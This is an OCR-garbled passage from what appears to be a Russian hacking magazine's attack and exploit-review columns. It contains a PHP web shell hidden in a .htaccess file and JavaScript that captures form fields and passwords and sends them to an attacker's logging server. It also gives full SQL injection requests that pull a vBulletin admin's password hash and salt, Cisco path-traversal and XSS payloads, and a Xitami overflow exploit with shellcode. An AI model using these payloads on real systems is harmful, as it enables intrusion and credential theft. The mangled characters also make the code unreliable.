сервера и сохранен локально в файлик Іа-Іа-Іа.кеу. Что дальше? От- 
крываем ѴѴігезбагк: 

1) Открываем отсниффанный НТТР5-трафик; 

2) Меню Е6І1; Рге-Регепсез; 




Расшифровываем НТТРБ-трафик 



3) в списке РГОІІОСОІ5 находим 551(вводя буквы); 

4) В К5А кеу 1І5І: пишем через запятую: 

5) ІР-адрес сервера^ порт^ протокол^ путь к ключу 
192.168.0.100,443,551,с:\1а-1а-1а.кеу; 

6) Арріу. 
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ВЗЛОМ 




ЗАДАЧА: 

ОПРЕДЕЛИТЬ ОБНОВЛЕНИЕ М5 501. 



РЕШЕНИЕ: 

Наверное, нет смысла говорить о том, что сбор информации о 
сервере/сервисе— вещь чрезвычайно важная при взломе. Получив 
точный номер версии, мы можем посмотреть уязвимости продукта, 
возможно— нарыть паблик-эксплоиты. Для М5 501 получить точный 
номер, включая номер билда,— не проблема. Через 501-запрос: 

5е1ес1: @@ѵег5Іоп 

Или Мтар’ом: 

Мшар -бѴ -р1433 <1;аг§е1;5> 

Но интересное далее. На ѵѵѵѵѵѵ.здиеапп.сопп/агбсіе/зді-зегѵег-ѵегзіопз 
(и аналогичных сайтах) добрые люди ведут сопоставление между 
конкретными версиями М 5 501 и номерами обновлений для него от 
М5. Что приятно— указаны и даты выпуска обновлений, и линки на 
них. Такчто мы сразу можем понять, обновляется ли сервер, и посмо- 
треть баги, исправленные в следующих патчах. 






-- ---- 




- - 


10.00.1823 


501 2Ш ЙТМ еде 


16 Моѵ 2009 


Ю.00Л818 




21 Вер 2009 


10.00.1812 


501 5ЭГѴРГ20Р8 ВТМ ед^ 


21 іи! 2009 


10,00 Л806 


3008 КТМ сдб 


18 Мау 2009 


10.00.179В 




17 Маг 2009 


10,00 Л787 


^91.5егѵ8г300? ЖМ СМ? 


19 Зап 2009 


10.00Л779 




17 НОѵ 2008 


10.00.1763 


^ 01 . 8?ГѴ?Г ІШ »гтм сді 


22 Вер 2008 


10.00.1600 


Зегѵег 2008 ПТМ 


6 Аид 2008 


5^^ 5егѵег 2005 


9.00.5266 


ээгѵег гш 5Р4 сдз 


21 Маг 2011 


9,00.5259 


501 ЗЧГУег 2005 5Р4 002 


22 РеЬ 2011 


9.00.5254 


50Ц Бегѵег 2005 5Р4 ОЛ 


20 Оес 2010 


9,00.5000 




17 Оес 2010 


9.00.4325 




21 Маг 2011 


9,00.4317 


$рзеді4 


21 РеЬ 2011 


9.00.4315 


501 5вгѵег20а5 5РЗ сиіз 


20 Оес 2010 



Сопоставление номера версии АЛ5 501 и патчей от про- 
изводителя 




ЗАДАЧА: ЗАЛИТЬ И СПРЯТАТЬ ВЕБ-ШЕЛЛ 
НА СЕРВЕРЕ. 



РЕШЕНИЕ: 

Решение данной задачи основано на посте в блоге, автор которого— 
ЕІбагМагсиззеп [ Ьіиу/ттіупі ). В нем он поделился опытом о тестиро- 
вании какой-то СМ5’ки, в которой предложил прятать шелл в стандарт- 
ном для АрасЬе файле— .Ыассезз. Сама идея не особо нова и не особо 
юзабельна, но что-то в ней определенно есть, ее стоит держать где-то в 
уме, на полочке. 

Напомню, .Ыассезз— это файл дополнительной конфигурации 
веб-сервера АрасЬе. Он является подобием Ьирб.сопі" стой раз- 
ницей, что действуеттолько на каталог, в котором располагается, и 
на его дочерние каталоги. Возможность использования .Ыассезз 
втомилиином каталоге указывается в бирб.сопі' (директива 
АНоѵѵОѵеггібе). 

Таким образом, получается, что закачав .Ыассезз на сервер, мы можем 
изменить настройки. Крометого, .Ыассезз является неплохим местом 
для того, чтобы спрятать ѵѵеЬ- шелл от глаз людских, потому какой в 
основном воспринимается какчто-то системное, необходимое. Ну а 
теперь практический пример: 



КРІІѲ5 ~ 

Огсіег аііоы^сіепу 
А1І0Ы -Ргош а11 
</Рі1е5> 

АсІсІТуре арр1іса1;іоп/х-ІтІ:1:рсІ-рІір .Іі1:ассе55 

#### <?рІір есбо "\п"; ра55І:Ііги($_СЕТ[ 'с' ] ." 2>&1"); ?> ##### 

Итак, пояснения. Первый блок используется для перезаписи де- 
фолтного правила, запрещающего доступ к.Ыассезз из веба. Далее 
определяем .Ыассезз какфайл, который исполняется какрЬр-скрипт. 

И последнее— в комментарияхспрятан простейший рЬр-шный шелл- 
код, который выполняет в системе команду, полученную в параметре 
'с' с выводом всех данных обратно в браузер. Запускаем команды 
следующим образом: Іі1;1;р://ѵіс1;іт. сот/ра1:Іі/ . Іі1;ассе55?с=соттапсІ. 
Как видишь— все просто. АрасЬе воспринимает этот файл как 
обычный .Ыассезз, а рЬр вырываеттолько нужный ему кусок. Еібаг 
Магсиззеп на этом не остановился, расширил сам шелл и продолжил 
изыскания новых векторов атак, связанныхсфайлами настроекАпача. 
Более подробную информацию можно прочитать здесь— Ы 1 :.[у/)ВН]М 2 . 
а скачать здесь— ЬіІ.[у/[и9СиР . 




ЗАДАЧА:ПОЛУЧИТЬ МАКСИМУМ ЧЕРЕЗ 
Х55-УЯЗВИМОСТБ. 



РЕШЕНИЕ: 

Х55— одна из самых распространенных сейчасуязвимостей на веб- 
сайтах. Потеории, Х55-бываютдвух видов: 

• з1;огеб/активнаяХ55— та, которая хранится на сервере и запускается 
сразу при открытии жертвой страницы; 

• ге[[ес1;еб/пассивнаяХ55— не хранится на сервере и требует от 
пользователя перехода по специально сформированной ссылке, код в 
которой и будет исполнен. 

Второй вид оченьчасто не воспринимается людьми какопасный. 
Дескать, пользователь сам дурак, что перешел по кривой ссылке. И 
оченьзря, ведьХ55 можно скрытье помощью сервисов по свертыва- 



нию ссылок, но более интересная идея описана дальше. Обычно всех 
пугают раскрытием данных из кукисов, которые чаще всего содержат 
идентификатор сессии и еще какую-нить конфиденциальную инфор- 
мацию: <5сгір1;>а1ег1;(сІоситеп1;.соокіе); </5сгір1;>. Как понятно, 
вместо отображения кукисов, злобные взломщики перенаправляютэти 
данные ксебе на сервер. В результате у них появляется возможность 
зайти на какой-то ресурс, используя данные кукисов под пользова- 
телем, у которого эти кукисы были украдены. Как ни странно, вполне 
адекватная защита отэтого есть — флаг НирОпІу который указывает на 
запрет чтения/записи данных Соокіе посредством ^аѵа5сгір1;, отсюда и 
название: кукисы доступны только через протокол НТТР. Получается, что 
атакующий уже не может украсть данных. Казалось бы Х55 мог потерять 
актуальность, однако есть несколько обходов этого ограничения. 

По сути своей, чтобы вполне осознать серьезность Х55-уязвимостей, 
важно понять, что, используя возможности яваскрипта, мы можем 
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сделать почти все что захотим. В качестве примера я хочу предста- 
вить нашего польского соратника по цеху— Кшиштофа Котовича и его 
творение с названием ХБЗ-Ігаскег: Ьіиѵ/927Ц68 . Суть идеи заклю- 
чается в том, чтобы используя возможности яваскрипт, следить за 
действиями пользователя на всем сайте и при необходимости сграбить 
ценные данные с просматриваемых страниц, либо выполнить какие-то 
команды вместо пользователя. Но какэто сделать? ВедьХЗЗ обычно 
находится на одной конкретной странице. Амы хотим следить за поль- 
зователем по всему сайту. Какже это сделать? Кшиштоф предложил ис- 
пользовать для этого развернутый на весь экран фрейм, куда поместить 
контенте настоя ідего сайта. В результате пользователь будет ползать 
уже внутри і^гате, при этом фактически не покидая страницу, где на- 
ходится Х55. Вредоносный яваскрипт при этом продолжает работу и 
имеет полный доступ ко всему, что находится внутри і^гате. Причем 
так как дырка находится на самом сайте и фрэйм оттуда же, то кросс- 
доменная политика никакие ограничиваетяваскрипт. Надеюсь, чтоу 
меня получилось понятно объяснить суть идеи. Если нет, то попракти- 
ковавшись на тестовом сайте Ьі1:.[ѵ/]ЕТУ0х .ты все поймешь. 

Не могу сказать, что полякоткрыл что-то неведанное, отаком подходе 
многие думали, но он сделал качественную реализацию, собрав все 
воедино. Пока в ХЗЗ-Ігаскег реализован мониторингввода данныхи 
перехват файлов. На практике все реализовано на базе библиотеки 
]0иегу и выглядит следуюідим образом. Сначала прячется сам фрэйм 
и подгружается исходная страницу: 

$( 'Ьосіу' ) .сбіІсІгепО .біеІеО; 

$( ' <і-Ргате> ' ) 

.С55({ ро5І1:іоп: ' аЬзоІиІіе ' ^ ыісііііі: '100%' ^ Ііеі§ІтІ:: '100%' ^ 
1:ор: 0^ 1е-р1і: 0^ Ьогсіег: 0^ Ьаск§гоипсІ : '#-р-р-Р' }) 
.а1;1;г( ' 5гс ' ^ ' Іі1;1;р://ехатр1е.сот' ) .аррепсІТо( ' Ьосіу' ); 

Доступ квнутренним элементам мы получаем каждый раз при об- 
новлении фрейма, то есть при любом переходе пользователя внутри 
Фрэйма. 

$( '<і-Ргате>' ) .1оасІ(-Рипс1:іоп() { 

1;ЬІ5 . соп1;еп1;1лІіпсІоы; 1:ЬІ5 . соп1;еп1;Ооситеп1;; 

}); 

Мониторинг переходов по всем ссылкам и ввод форм. 

$( 'Ьосіу' ^1;ЬІ5 . соп1;еп1;Ооситеп1;) 

.■бпс1( 'а ' ) 

.с1іск(-Рипс1:іоп() { 

1о§({еѵеп1;: ' сііск' ^ '-Ргош': Іосаіііоп^ 'Ьге-Р': 1:ЬІ5 . Ьге-Р^ 
'1:аг§е1: ' : 1:ЬІ5 .1:аг§е1;}) ; 

}) 

.епсі() 

.1іпсІ( '-Рогш' ) 

.5иЬті1;(-Рипс1;іоп() { 

1о§({еѵеп1;: '5иЬті1:'^ 

■Ргот: 1оса1:іоп^ 

асіііоп: $(1;ЬІ5) .а1:1;г( 'асіііоп' ) || Іосаіііоп^ 

1іе1сІ5: $( сЬіб) .5егіа1І2е() 

}); 

}) 

.епсі(); 

Аналогичным образом, используя селекторы ]0иегу, мы можем об- 
ратиться клюбому элементу внутри страницы. Селектор— это что-то 
вроде описания элемента, к которому обраідаешься. Причем селек- 
торы можно задавать в своего рода регекспах. Если интересно, очень 
показательно все описано на сайте арі.]диегу.сопп/саІедогѵ/5е[есІог5 . 
Например, используя следуюідий селектор, мы находим поле ввода с 
именем раззѵѵогб и выводим егозначение алертом на экран: а1ег1;( 

$( ' іпри1;[пате I ="ра55ыогсІ"] ' ) .ѵа1());. Ну и система логи рования 




Логика работы Х55Чгаскег'а — все внутри і!гате 

всехукраденныхданных находится на любом стороннем сайте. Дан- 
ные отправляются через ОЕТ-запрос: 

■РипсЫоп 1о§(ыЬа1і) { 
ыЬа1;["_"] = Ма1:Ь. гапсІошО; 

Тгу { 

$.§е1;(1о§иг1^ ыЬа1;); 

} саТсІі (е) { 
ѵаг і = пеы Іта§е(); 

І.5ГС = 1о§ІІг1 + "?" + епсосІеикіСотропеп1;($.рагат(ыЬа1:)) ; 
$(і) .1оасІ(-Рипс1;іоп() {$(1;ЬІ5) .гетоѵе();}) .аррепсІТо( "Ьосіу"); 

} 

}; 

Остальные фичи и возможности иіди на сайте автора. В обідем, идея 
хороша, и над реализацией автортоже потрудился на славу. Ему спа- 
сибо :). Теперь о минусах и тонкостях. 

1. Данная реализация из-за Х55-фильтра не работаете ІЕ8 и СЬготе. 

2. Против данной технологии (ХЗЗ+іІ'гате) используются методы за- 
ідиты— І'гате Ьизбпд. Это специальные яваскрипты, уничтожаюідие 
фреймы. Но это все тоже можно обойти :). 

3. При открытии в фрейме другого сайта, мы уже не можем просматри- 
вать внутренности из-за кросс-доменных политик. 

В обідем, тема очень большая и не совсем подходит к формату этой 
рубрики. Странно, что никто из авторовжурнала, более прошаренных в 
ѵѵеЬ-безопасности, чем я, еіде не писал об этом :). 

И под конец еіде один небольшой пример, чтобы еіде больше напугать 
всех. Следуюідую атакуудалось провернуть мне с Алексеем Синцовым. 
Есть сайт А, на котором естьХЗЗ-уязвимость. Есть пользователь, 
который залогинен на сайте А. Куки заідиідены НирОп[у+ рандомный 
идентификатор в самом НТМЕ-коде. Была реализована следуюідая 
атака. Пользовательзашел на сайт Б, который принадлежитзлоу- 
мышленнику. На этом сайте в скрытом фрейме подгрузился сайт А с 
запуском Х55-уязвимости. Данная уязвимость запустила ХЗЗ-Ігаскег, 
то есть еіде один фрэйм ссайтом А. Докрученный ХЗЗ-Ігаскег вынул из 
кода рандомный идентификатор и сучетом того, что куки с браузером 
жертвы посылаются автоматом, смог выполнить команду от имени 
жертвы. Получился такой злойХ55+С5РЕ. В результате даже впари- 
вать кривую ссылку пользователю не надо. 

Р5. Хотелось бы поблагодарить Дмитрия Евдокимова ака В1 д1 (ре- 
дактора раздела софта Зесигііу нашего ВѴВ) за помоідь, оказанную в 
подготовке материалов в эту рубрику :). 

Р52. В продолжениетемы о наполнении себя знаниями— приходи на 
встречи Веі'соп-Риззіа [ѵѵѵѵѵѵ.сІе[соп-ги55Іа.ги ].^с 
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Минувший месяц был достаточно богат на публикации разно- 
образных зксплоитов, в особенности для веб-приложений: ^ооп1Іа, 
ѵВиІІеІіп и ѴѴогбРгезз стабильно показывают хорошие (а для кого- 
то и плохие) позиции в чартах. Все их разобрать в обзоре, увы, не 
выйдет, но самые интересные уже ждут тебя! 



501-ИНЪЕКЦИЯ В ѴВиіІЕТІМ 4.0.x => 
4.1.2 



СѴ55Ѵ2 



7.5 ( АѴ: М/АС : 1/Аи : М/С : Р/І : Р/А: Р) 

ѵВиІІеІіп — один из самых распространенных форумных движков, а с 
недавних пор еще и СМ5 (ѵВиІІеІіп РиЫізЫпд зиііе), в простонародье 
— булка. Немецкий исследователь под псевдонимом 50Ьп.ХЗгуже не 
в первый раз находит багу в этом движке, и в этот раз кпоискамего 
подтолкнуло очередное обновление безопасности, в котором исправ- 
лялись некоторые критическиеуязвимости. Такой метод обратного 
инжиниринга патчей широко используется исследователями для 
выявления багов какв обычных скриптах, та к и в бинарных файлах. В 
этом случае требуется лишь просмотреть изменения, которые вносит 
патч, и сделать соответствующие выводы. Таким образом, область 
поиска существенно сокращается. 



ЕХРЮІ 



Взор багоискателя пал на два файла. Первым из нихбыл/ѵЬ/зеагсб/ 
зеагсЫооІз.рбр и конкретно функция деШізрІауЗігіпд: 

риЫіс 5І:а1;іс Типсіііоп §е1;0І5р1ау51;гіп§($1;аЫе^ 
$1;аЫе_сІІ5р1ау^ $1іе1сіпате^ $кеу^ $ісі^ $сотрага1;ог^ $І5_сІа1;е) 

{ 

§1оЬа1 $ѵЬи11е1:іп^ $ѵЬрІіга5е; 

$пате5 = аггау(); 

ІТ (І5_аггау($ісІ)) 

{ 

$5д1 = "5ЕІЕСТ ОІ5ТІМСТ $1;аЫе.$біе1сІпате Тгот " . 



ТАВІЕ_РКЕРІХ . 

"$1;аЫе А5 $1:аЫе ІЛІНЕКЕ $кеу IN (" . ітр1осIе('^ \ $ісІ) . 
і-р ($Г5І; = $ѵЬи11е1;іп->сІЬ->диегу_геасІ($5д1)) 

{ 

ыІіі1е($гоы = $ѵЬи11е1:іп->сІЬ->-Ре1:сІі_гоы($г5І:)) 

{ 

$пате5[] = $гоы[0]; 

} 

} 

ІТ (соип1:($пате5) > 0) 

{ 

геііигп $1;аЫе_сІІ5р1ау . . ітр1осІе('^ $пате5); 

} 

} 

еІ5е 

{ 

//ІТ ые §01: Ііеге^ ые баѵе а 5Іп§1е ѵаіие 
ІТ ($гоы = $ѵЬи11е1:іп->сІЬ->диегу_1іг5І:( 

"5ЕІЕСТ $1:аЫе.$Ріе1сІпате Тгот " . ТАВІЕ_РКЕРІХ . 
"$1:аЫе А5 $1:аЫе ІлІНЕКЕ $кеу = $ісі")) 

{ 

геііигп $1:аЫе_сІІ5р1ау . ' ' . 

5ѲІТ: :§е1:Сотраге51:гіп§($сотрага1:ог^ $І5_сІа1:е) 

. ' ' . $гоы[0]; 

} 

} 

геііигп 



Интерес для нас в этой функции представляетпеременная $ісІ, которая 
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ЕХРЮІТ8 
РЕѴІ Еуі > 




Сі$со подтверждает, что облажалась 



никак В ней не фильтруется. Теперь посмотрим, где используется эта 
уязвимая функция, и обнаружим файл/раскадез/ѵЫ'огипп/зеагсЬАуре/ 
зосіаІдгоир.рЬр, строки 201-203: 

ѵВ_5еагсІі_5еагсІтІ;ооІ5 : : §е1;0І5р1ау51:гіп§( 

' 50сіа1§гоирса1:е§огу ' ^ $ѵЬрІіга5е[ ' са1:е§огіе5 ' ] ^ 

' 1;і1:1е ' ^ ' 50сіа1§гоирса1;е§огуісІ ' ^ 

$ѵа1ие^ ѵВ_5еагсІі_Соге: :ОР_Е^^ 1;гие )); 

Истина где-то рядом. Как действовать дальше? Из параметров 
функции становится ясно, что вызов связан с поиском по неким 
«зосіаі дгоирз». В ходе экспериментов рекомендуется использовать 
Ыѵе НТТР Неасіегз — плагин для РігеЬх, так как нам придется ра- 
ботать с параметрами в Р05Т-запросах. Так как исходная функция 
явно используется при поиске, то подвергнем экзекуции страницу 
поиска зеагсЬ.рЬр. Перейдем по ссылке «ЗеагсЬ МиШрІе Сопіепі; 
Турез» и отметим галочку напротив «дгоирз», а в строку поиска 
введем название какой-нибудь суидествуюидей группы или ее часть, 
например, Іеат. Воттакой Р05Т-запрос при этом получится: 

1:уре%5В%50=7&диегу=1;еат&1:і1;1еоп1у=1&5еагсІіи5ег=&ех 

ас1:пате=1&1;а§=&сІо5еагсІі=5еагсІи-Моы&5еагсІісІа1:е=0&Ье-Рогеа-Рі;ег=а 

-Рі;ег&50г1;Ьу=ге1еѵапсе&огсІег=сІе5сепсІіп§&5аѵерге-р5=1&5=&5есигі1; 

у1;океп=1302542927-с14с-р038925-Р1ЬЬа6869е060Ь837с1651371-Р1с0е0&с1о 

=ргосе55&5еагсІі1;ІігеасІісІ= 

Для эксплуатации уязвимости дополним исходный запрос 501- 
инъекцией: 

1:уре%5В%50=7&диегу=1:еат&1:і1;1еоп1у=1&5еагсІіи5ег=&ех 
ас1;пате=1&1;а§=&сІо5еагсІі=5еагсІи-Моы&5еагсІісІа1:е=0&Ье-Рогеа-Рі;ег=а 
-Рі;ег&50г1;Ьу=ге1еѵапсе&огсІег=сІе5сепсІіп§&5аѵерге-р5=1&5= 
&5есигі1;у1;океп=1302542927-сІ4с-Р038925-РіЬЬа6869е060Ь837сІ6513 
7іТіс0е0&сІо=ргосе55&5еагсІтІ:ІігеасІісІ=&са1;[0]=1) ІІМІОМ 5ЕІЕСТ 
’ІіахІіах' # 

Бинго! В содержимом страницы появилась наша инъектируемая строка 
ЬахЬах. Едем дальше: модифицируем запростак, чтобы вывести логин, 
хэш,сольи мэйл админа: 

1:уре%5В%50=7&диегу=1:еат&1:і1;1еоп1у=1&5еагсІіи5ег=&ех 
ас1;пате=1&1;а§=&сІо5еагсІі=5еагсІи-Моы&5еагсІісІа1:е=0&Ье-Рогеа-Рі;ег=а 
-Рі;ег&50г1;Ьу=ге1еѵапсе&огсІег=сІе5сепсІіп§&5аѵерге-р5=1&5= 
&5есигі1;у1;океп=1302542927-сІ4с-р038925-РіЬЬа6869е060Ь837сІ 
65137іТіс0е0&сІо=ргосе55&5еагсІтІ;ІігеасІісІ=&са1;[0]=1) ІІМІОМ 
5ЕІЕСТ сопса1:_ы5(0xЗа^и5егпате^ра55ыогсI^5а11:^етаі1) РВОМ 
Ьи11е1;іпи5ег Іітіі; 1Д# 

Далее осталось лишь подобрать пароль любыми подручными сред- 
ствами, будьте ЗоЬп ТЬе Ріррег, РаззѵѵогбзРго или какой-нибудь 
онлайновый сервис, коих нынче развелось в достатке. 



ТАРОЕТ5 



• ѵВииебп РиЫізЫпд 5иі1е4.0.0 — 4.1 .2 

• ѵВиІІеІіп Рогит С1аззіс4.0.0 — 4.1 .2 





ЕХРЕ0ІТ8 




КЕѴІЕѴѴ 



50ШТІ0М 



Обновить движок до более поздней версии или установить патч. 
Виде суидествует метод патчинга вручную, который заключается в 
том, что переменная $ісІ оборачивается в вызов специальной функ- 
ции, фильтруюидей нежелательные значения: 

$ісІ = $ѵЬи11е1;іп->сІЬ->5д1_ргераге($ісІ); 
і-р (І5_аггау($ісІ)) 

{ 

Но это еиде не все. Так как переменная $ісі может быть массивом 
переменных, нужно добавить в функцию зді_ргераге() обработку 
этого случая (поумолчанию его там, какни странно, нет). Конечный 
вариант вы глядит так: 

■РипеРіоп 5д1_ргераге($ѵа1ие) 

{ 

і-р (І5_5І;гіп§($ѵа1ие)) 

{ 

ге1:игп . $1;ІіІ5->е5саре_5І:гіп§($ѵа1ие) . 

} 

еізе і-р (І5_питегіс($ѵа1ие) АМО $ѵа1ие + 0 == $ѵа1ие) 

{ 

геТигп $ѵа1ие; 

} 

еізе і-р (І5_Ьоо1($ѵа1ие)) 

{ 

геіигп $ѵа1ие ? 1 : 0; 

} 

еізе і-р (І5_пи11($ѵа1ие)) 

{ 

геіигп " ' ' 

} 

еізе і-р (І5_аггау($ѵа1ие)) 

{ 

-РогеасРі ($ѵа1ие аз $кеу => $і1;ет) 

{ 

$ѵа1ие[$кеу] = $1;ІіІ5->5д1_ргераге($і1;ет); 

} 

геіигп $ѵа1ие; 

} 

еізе 

{ 

геіигп . $1;ІіІ5->е5саре_5І;гіп§($ѵа1ие) . 

} 

} 

МНОЖЕСТВЕННЫЕ УЯЗВИМОСТИ В 
СІ5СО иМІРІЕО ОРЕкАТІОМБ ЛЛАМАОЕк 
8.0 И 8.5 



СѴ55Ѵ2 



7. 5 ( АѴ: М/АС : Е/Аи : М/С : Р/І : Р/А: Р) 

Сізсо СІпібесІ Орегаііопз Мападег (СиОМ) — комплексное решение 
от известного вендора, предназначенное для мониторинга состоя- 
ния сети и оперативного решения возникаюидих проблем. Решение 
это оказалось на удивление дырявым. В середине мая исследова- 
тели из Зепзе оі" Зесигііу опубликовали целый вагон уязвимостей в 
этом ПО: здесь и слепые 50Е-инъекции, и межсайтовый скриптинг, 
и выход за корневую директорию веб-сервера. Традиционно, в 
случае множественныхуязвимостей счетчикСѴЗЗ определяется 
по самой серьезной из них, в данном случае это 5СЕ-инъекция, и 
поэтому наш экспонат заработал 7,5 баллов из 1 0. 
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взлом 



Уязвимая страница поиска ѵВиІІеІіп 






ЕХРЮІТ8 

РЕѴІЕѴѴ 



ЕХРЮІТ5 

РЕѴІЕѴѴ 



Перезапись освобожденного объекта значением ОсОсОсОс 



ЕХРЮІТ 



1. Переменная ССМз в скрипте РРТезіСгеаІіоп.сІо подвержена слепой 
501-инъекции, которую можно продемонстрировать банальной одинар- 
ной кавычкой: 

/ір1;т/РКТе5І;Сгеа1;іоп . сIо?Ке^ие51;5оигсе=сIа5І^ЬоагсI&МАС5=&ССМ5= 

' ыаі1;-Рог%20сІе1ау '0:0:20'- -&Ех1;п5=&ІР5= 

Аналогичнойуязвимости подвержена переменная сспп в скрипте 
ТеІеРгезепсеРерогіАсбоп.сІо: 

/ір1;т/Те1еРге5епсеКерог1;Ас1;іоп.сІо?сст= 'ыаі1:-Рог%20 
сіеіау '0:0:20' -- 

2. ПассивныеХЗЗ были обнаружены в большом количестве скриптов 
приложения Соттоп Зегѵісез Оеѵісе Сепіег, вотлишь некоторые из 

НИХ: 

/Ір1;т/асіѵапсесі1іпсі.сі0?ех1;п=73-рсь</5сгір1;><5сгір1;>а1ег1:(1) 

</5Сгір1;>23-РЬе43447/ір1;т/1о§іса1Торо.сІо?с1и5І;егМате= 

сІЬ4с1"%ЗЬа1ег1;(1)//4031са-Р63сІ7 

Полный СП и со к уязвимых скриптов находится в адвизори 505-1 1 - 
006, которая в свободном доступе обитает в интернете. Не уда- 
лось утаить баги и приложению под названием Соттоп 5егѵісез 
Ргатеѵѵогк Неір 5егѵ1е1;, в котором тоже была обнаружена пассив- 
ная Х55: 

/сыІір/сІеѵісе.сеп1:ег.сІо?сІеѵісе=&72а9-Р"><5сгір1:>а1ег1;(1)</ 

5сгір1;>5-Р5251ааасІ=1 

3. Продолжаетнаш хит-парад веб-приложение СізсоѴѴогкз 
Нотераде, которое порадует нас возможностью выхода за пределы 
корневой директории веб-сервера, благодаря чему становится воз- 
можным читать произвольные файлы в системе. Ниже представлены 
наиболее интересные случаи, содержа ідие настройки баз данных и 
логи изменения паролей: 

• : //1;аг§е1; : 1741/сыІір/аисІі1;Іо§ . с1о?^1е= 

\Ьоо1і. іпі 

• : //1;аг§е1: : 1741/сыІір/аисІі1:Іо§ . сІо?бі1е= ..\..\.Л..\.Л.Л.. 
\Рго§гат Рі1е5\С5С0рх\М0С\Тотса1:\ыеЬарр5\1;гіѵепі\1лІЕВ-ІМР\ 
с1а55е5\5сііесіи1е . ргорег1;іе5 

• Іі1;1;р : //1;аг§е1; : 1741/сыІір/аисІі1;Іо§ . сІо?^1е= 

\Рго§гат Рі1е5\С5С0рх\1іЬ\с1а55ра1:Іі\сот\сІ5Со\пт\ст-р\ 
сІЬ5егѵісе2\0В5егѵег . ргорег1;іе5 

• Іі1;1;р : //1;аг§е1: : 1741/сыІір/аисІі1:Іо§ . сІо?бі1е= Л. Л. Л. Л. Л.. 

\Рго§гат Рі1е5\С5С0рх\1о§\сІЬрысІСІіап§е . 1о§ 



50ШТІ0М 



Нужно обновить СиОМ до версии 8.6 или более поздней. Либо можно на- 
катить патчи отСізсо, которые можно обнаружить на страницах, посвя- 
іденных соответствую [ДИМ багам: С5Сіп61 716, С5Сіо1 2704, С5Сіо1 271 2 
ИС5СЮ35577. 

ПО ХІТАМІѴ\/ЕВ5ЕРѴЕР2.5В4:ЩАЛЕН- 
О НОЕ ПЕРЕПОЛНЕНИЕ БУФ^А 



СѴ55Ѵ2 



9.3(АѴ:М/АС:М/Аи:М/С:С/І:С/А:С) 

[32Ш 

Хііаті — ѵѵеЬ/Лр-сервер, первоначально создаваемый с 1 996 по 
2000 годы конторой іМаІгіх, как бесплатный продукт с открытыми 
исходными кодами. Работаетон какодиночный процесс и истре- 
бует для своей работы больших объемов памяти. Хііаті по скорости 
работы не дотягивает до быстрейших серверов, но по заверениям 
производителя является хорошо расширяемым решением. Более 
того, он поддерживает некоторое количество прикладных протоко- 
лов, а также имеет веб-интерфейс, через который можно конфигу- 
рировать ѵѵеЬ/Лр-сервер. 

Код эксплоита можно найти на популярном ресурсе ехрІоіІ-сІЬ.сот 
в разделе Ретоіе Ехріоііз. Для академических целей мы его слегка 
модифицируем под себя. 



ЕХРЮІТ 



В самом коде скрипта автором приведена краткая справка по его ис- 
пользованию. Выглядитона следуюідим образом: 

#гоо1:@Ы; : ~# ссі Оезкііор/ 

#гоо1:@Ы; : ~# ./Хі1;аті2_5Ь4.р1 

# Еп1;ег уоиг 1:аг§е1;'5 ІР (е.§. : 192.168.0.123) 

# > 192.168.178.37 

# [*] 5епсІіп§ 1;Ііе еѵіі беасіег а1і: 192.168.178.37 

# [*] ОК^ ехр1оі1;а1;іоп Оопе! 

# [*] Сбеск ріеазе -Рог 1;бе збеіі 

Вместо полезной нагрузки, размеіденной в скрипте автором, забацаем 
классический калькулятор. Сказано — сделано. 

# ШБ-Ррауіоасі ыіпсІоы5/ехес стсі=са1с.ехе К | шз-РепсосІе -е х86/ 
а1рба_тіхесі -1: регі 

[*] х86/а1рба_тіхесі зиссеесіесі ыі1;б 5Ііе 461 (і1;ега1;іоп=1) 
ту $Ьи-Р = 

"\х89\хе2\хсІ9\хеа\хсІ9\х72\х-Р4\х5а\х4а\х4а\х4а\х4а\х4а\х4а" . 
"\х4а\х4а\х4а\х4а\х4а\х43\х43\х43\х43\х43\х43\х37\х52\х59" . 
"\х6а\х41\х58\х50\х30\х41\х30\х41\х6Ь\х41\х41\х51\х32\х41" . 
"\х42\х32\х42\х42\х30\х42\х42\х41\х42\х58\х50\х38\х41\х42" . 



► 044 
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ЕХРЮІТ8 




ри$(і е$р - геіп, передача управления на пор-цепочку 





ЕХРЮІТ8 




КЕѴІЕѴѴ 




Пробегаем по пор-цепочке до полезной нагрузки 

"\х75\х4а\х49\х49\х6с\х58\х68\х4с\х49\х45\х50\х43\х30\х43" . 
"\х30\х45\х30\х4Ь\х39\х4сІ\х35\х50\х31\х58\х52\х51\х74\х4с" . 
"\х4Ь\х43\х62\х54\х70\х4с\х4Ь\х50\х52\х54\х4с\х4с\х4Ь\х52" . 
"\х72\х45\х44\х4с\х4Ь\х51\х62\х45\х78\х56\х6-р\х4с\х77\х50" . 
"\х4а\х54\х66\х56\х51\х49\х6-р\х54\х71\х4-р\х30\х4с\х6с\х47" . 
" \х4с\х51\х71\х51\х6с\х43\х32\х54\х6с\х51\х30\х4Ь\х71\х5а " . 
"\Х6-Р\х54\х4с1\х43\х31\х5а\х67\х58\х62\х5а\х50\х52\х72\х50" . 
"\х57\х4с\х4Ь\х56\х32\х54\х50\х4с\х4Ь\х50\х42\х45\х6с\х43" . 
"\х31\х58\х50\х4с\х4Ь\х43\х70\х51\х68\х4-Р\х75\х4-Р\х30\х43" . 
"\х44\х52\х6а\х45\х51\х5а\х70\х52\х70\х4с\х4Ь\х51\х58\х45" . 
"\х48\х4е\х6Ь\х43\х68\х45\х70\х47\х71\х49\х43\х4сІ\хЗЗ\х45" . 
"\х6с\х51\х59\х4с\х4Ь\х54\х74\х4е\х6Ь\х45\х51\х4Ь\х66\х54" . 
"\х71\х4Ь\х4-р\х56\х51\х49\х50\х4е\х4с\х5а\х61\х58\х4-р\х56" . 
"\х6сІ\х47\х71\х5а\х67\х45\х68\х4Ь\х50\х54\х35\х4Ь\х44\х43" . 
" \хЗЗ\х51\х6сІ\х4Ь\х48\х45\х6Ь\х43\х4сІ\х47\х54\х50\х75\х5а " . 
"\х42\х43\х68\х4е\х6Ь\х50\х58\х47\х54\х45\х51\х5а\х73\х45" . 
"\х36\х4с\х4Ь\х56\х6с\х52\х6Ь\х4е\х6Ь\х56\х38\х45\х4с\х56" . 
"\х61\х49\х43\х4е\х6Ь\х47\х74\х4е\х6Ь\х43\х31\х5а\х70\х4с" . 
"\х49\х50\х44\х47\х54\х56\х44\х51\х4Ь\х43\х6Ь\х43\х51\х51" . 
"\х49\х50\х5а\х56\х31\х4Ь\х4-р\х4сІ\х30\х51\х48\х51\х4-р\х43" . 
